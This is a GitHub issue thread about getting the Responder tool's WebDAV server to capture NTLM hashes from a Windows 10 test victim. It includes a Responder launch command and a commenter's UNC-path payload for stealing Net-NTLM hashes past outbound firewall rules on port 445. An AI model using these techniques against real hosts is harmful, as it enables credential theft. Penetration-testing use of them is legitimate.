This repository has been archived by the owner on Aug 7, 2020. It is now read-only.
WebDav NTLM auth #143
Comments
|
Hello, same issue I think, I'm trying to steal Net-NTLM hash with payload like \\publicIP@80\img.png to bypass outgoing firewall rules on 445. Kali and lgandx's git repo seem's to be more up to date than this official (see IsWebDAV implementation in server/HTTP.py but still not work. Nobody has encountered this kind of problem? EDIT: https://blog.didierstevens.com/2019/05/20/webdav-ntlm-responder/ Regards, Hypnoze. |
Sign up for free
to subscribe to this conversation on GitHub.
Already have an account?
Sign in.
Hi all,
I tried to capture NTLM hash with WebDAV HTTP Server but i didn't manage...
Well, the victim's host is a Win 10 (fully updated) machine and the responder's host is a Kali VM.
I modified responder conf file to disable SMB server, then execute : # responder -I eth0
When the victim ask the test.pdf file ("OPTIONS /test.pdf HTTP/1.1"), responder answer ("HTTP/1.1 200 OK", but without DAV HTTP header) but no NTLM auth followed (NTLM is not disabled in my windows victim conf). And then, victim requested PROPFIND method without any answer (see PCAP transformed in TXT file attached : WebDAV-wihout-NTLM-authen.txt).
It seems that WebDAV server isn't on... I missed something?
PS : It works whith SMB protocol
@lgandx, si tu as 5 mn pour regarder, je t'en serai reconnaissant.
Regards,
Rémi
The text was updated successfully, but these errors were encountered: